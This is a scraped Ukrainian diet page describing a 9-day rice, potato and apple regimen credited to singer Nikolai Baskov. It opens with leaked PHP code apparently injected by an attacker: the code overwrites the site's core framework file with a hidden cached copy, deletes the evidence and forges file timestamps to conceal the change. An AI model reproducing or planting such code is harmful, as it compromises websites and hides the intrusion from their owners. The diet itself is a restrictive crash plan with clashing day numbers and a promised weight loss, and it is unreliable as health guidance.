$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Власна дієта Баскова | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Власна дієта Баскова

baskov1


Ні для кого не секрет що відомому співаку Миколі Баскову постійно доводиться боротись з надлишковою вагою. На жаль, на спорт у Миколи часу немає, тому він розробив ідеальну для себе 9-денну дієту. Яку умовно можна розділити на три блоки по три дні.

 

1,2,3 день.
Рис без солі і масла.  Спосіб приготування: Крупа рису замочується на цілу  ніч, а потім відварюється за три прийоми по 5хв. Готовий рис промивається в проточній холодній воді.
Результат: як не було 2 кг.

3,4,5 день.
Відварна картопля. Варити бажано без солі. (після трьох днів рису картопля здається шедевром кулінарії)

6,7,8 день
Печені яблука та тушковані овочі.

Всі 9 днів пити можна тільки зелений чай БЕЗ цукру та негазовану воду.

Їсти можна в любий час і в любих кількостях. (хоча повірте що багато ви все одно не з’їсте )

 

 
Ефективні дієти Власна дієта Баскова